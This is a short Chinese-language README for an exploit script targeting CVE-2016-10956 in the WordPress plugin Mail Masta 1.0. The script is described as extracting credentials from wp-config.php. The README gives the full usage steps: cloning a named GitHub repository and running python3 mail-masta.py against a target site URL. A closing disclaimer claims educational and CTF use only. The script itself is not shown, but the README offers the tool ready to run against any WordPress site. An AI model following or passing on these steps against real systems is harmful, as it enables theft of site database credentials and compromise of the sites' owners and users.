此脚本利用 WordPress Plugin Mail Masta 1.0 中的 CVE-2016-10956 漏洞,从 wp-config.php 中提取凭据。
克隆仓库:
git clone https://github.com/Hakchoven/wp-mail-masta-exploit.git
进入目录:
cd wp-mail-masta-exploit/
使用目标 URL 作为参数运行脚本:
python3 mail-masta.py http://example.com/wordpress
将 http://example.com/wordpress 替换为目标 WordPress 站点的 URL。
此脚本仅供教育目的使用。作者不赞同或支持将本脚本用于非法或不道德的活动。此脚本仅应用于合法的安全研究或 CTF 环境。使用风险自负。
由 Hackhoven 制作